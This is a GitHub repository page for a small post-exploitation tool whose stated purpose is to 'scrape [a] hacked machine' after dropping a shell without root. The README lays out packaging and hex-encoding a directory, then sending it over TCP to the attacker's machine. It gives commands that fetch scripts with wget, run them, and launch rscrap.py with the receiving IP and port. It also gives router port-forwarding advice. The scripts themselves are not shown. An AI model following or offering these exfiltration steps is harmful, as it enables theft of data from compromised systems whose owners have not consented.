Skip to content

ertosns/scrape

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

# scrape tool

## purpose
- this tool is intended to be executed after you drop a shell in a remote server, but without root permissions, or in the scenario when there is no tools such as scp.

## instructions
- tar, and zip given, and readable directory.
- send it to public, or local machine.


##strategies
- those scripts are supposed to package everything under given directory, zip, then translate it to hex form to be read through the browser.
- open TCP connection to my local machine, and transfer everything.

## execution
wget raw.githubusercontent.com/ertosns/scrap/main/scrap.sh
bash scrap.sh
wget raw.githubusercontent.com/ertosns/scrap/main/rscrap.py
python3 ./rscrap.py -t c -a {IP} -p {PORT}

## notes
- if case you don't know the ip of the target machine you have to set your router to 'port forward' the port set in the local server.

About

scrape hacked machine

Resources

Stars

1 star

Watchers

1 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors